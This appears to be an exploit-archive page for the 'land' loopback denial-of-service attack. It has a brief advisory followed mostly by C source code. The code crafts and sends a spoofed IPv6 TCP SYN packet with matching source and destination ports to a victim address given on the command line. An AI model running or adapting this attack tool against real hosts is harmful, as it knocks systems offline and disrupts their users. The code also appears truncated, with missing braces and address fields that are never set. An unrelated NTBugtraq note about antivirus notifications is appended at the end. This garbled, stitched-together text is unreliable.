FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2)

st3n 20.11.1997 Verified
Denial of Service Exploits Multiple

Exploit Code

A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 

// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135
// Written by: Konrad Malewski.

#include <stdlib.h>
#include <stdio.h>
#include <Winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
///////////// from libnet /////////////
/* ethernet addresses are 6 octets long */
#define ETHER_ADDR_LEN      0x6

typedef unsigned char  u_int8_t;
typedef unsigned short u_int16_t;
typedef unsigned int   u_int32_t;
typedef unsigned __int64 u_int64_t;
*  Ethernet II header
*  Static header size: 14 bytes
struct libnet_ethernet_hdr
  u_int8_t  ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
  u_int8_t  ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
  u_int16_t ether_type;                 /* protocol */

struct libnet_in6_addr
    u_int8_t   __u6_addr8[16];
    u_int16_t  __u6_addr16[8];
    u_int32_t  __u6_addr32[4];
  } __u6_addr;            /* 128-bit IP6 address */

*  IPv6 header
*  Internet Protocol, version 6
*  Static header size: 40 bytes
struct libnet_ipv6_hdr
  u_int8_t ip_flags[4];     /* version, traffic class, flow label */
  u_int16_t ip_len;         /* total length */
  u_int8_t ip_nh;           /* next header */
  u_int8_t ip_hl;           /* hop limit */
  struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */


*  TCP header
*  Transmission Control Protocol
*  Static header size: 20 bytes
struct libnet_tcp_hdr
  u_int16_t th_sport;       /* source port */
  u_int16_t th_dport;       /* destination port */
  u_int32_t th_seq;          /* sequence number */
  u_int32_t th_ack;          /* acknowledgement number */
  u_int8_t th_x2:4,         /* (unused) */
th_off:4;        /* data offset */

  u_int8_t  th_flags;       /* control flags */
  u_int16_t th_win;         /* window */
  u_int16_t th_sum;         /* checksum */
  u_int16_t th_urp;         /* urgent pointer */

int libnet_in_cksum(u_int16_t *addr, int len)
  int sum;
    u_int16_t s;
    u_int8_t b[2];
  sum = 0;
  while (len > 1)
    sum += *addr++;
    len -= 2;
  if (len == 1)
    pad.b[0] = *(u_int8_t *)addr;
    pad.b[1] = 0;
    sum += pad.s;
  return (sum);
#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))

u_char packet[74];
struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;

u_char errbuf[1024];
pcap_t *pcap_handle;

void usage(char* n)
  pcap_if_t * alldevs,*d;
  int i=1;
    "\t %s <device> <victim> <port>\n",n);

  if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
    fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
  printf("Avaliable adapters: \n");
  d = alldevs;
  while (d!=NULL)
    printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
    d = d->next;
  pcap_freealldevs (alldevs);
int main(int argc, char* argv[])
  if ( argc<4 )
    return EXIT_FAILURE;

  int retVal;
  struct addrinfo hints,*addrinfo;


  WSADATA wsaData;
  if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
    fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
    return EXIT_FAILURE;
  // Get MAC address of remote host (assume link local IpV6 address)

  hints.ai_family = PF_INET6;
  hints.ai_socktype = SOCK_STREAM;
  hints.ai_protocol = IPPROTO_TCP;
  hints.ai_flags = AI_PASSIVE;

  retVal =  getaddrinfo(argv[2],0, &hints, &addrinfo);
  if ( retVal!=0 )
    fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());

  // Open WinPCap adapter
  if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL )
    fprintf(stderr, "Error opening device: %s\n",argv[1]);
    return EXIT_FAILURE;

  struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;

  // fill ethernet header
  eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something;
  eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
  eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
  eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
  eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
  eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
  eth_hdr->ether_type = 0xdd86;

  // fill IP header
  // source ip == destination ip
  ip6_hdr->ip_hl = 255;
  ip6_hdr->ip_nh = IPPROTO_TCP;
  ip6_hdr->ip_len = htons (20);
  ip6_hdr->ip_flags[0] = 0x06 << 4;
  srand((unsigned int) time(0));
  // fill tcp header
  tcp_hdr->th_sport = tcp_hdr->th_dport =  htons (atoi(argv[3])); // source port equal to destination
  tcp_hdr->th_seq = rand();
  tcp_hdr->th_ack = rand();
  tcp_hdr->th_off = htons(5);
  tcp_hdr->th_win = rand();
  tcp_hdr->th_sum = 0;
  tcp_hdr->th_urp = htons(10);
  tcp_hdr->th_off = 5;
  tcp_hdr->th_flags = 2;
  // calculate tcp checksum
  int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
  chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
  chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr));
  tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
  // send data to wire
  retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
  if ( retVal == -1 )
    fprintf(stderr,"Error writing packet to wire!!\n");
  // close adapter, free mem.. etc..
  return EXIT_SUCCESS;

NTBugtraq Editor's Note:

Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.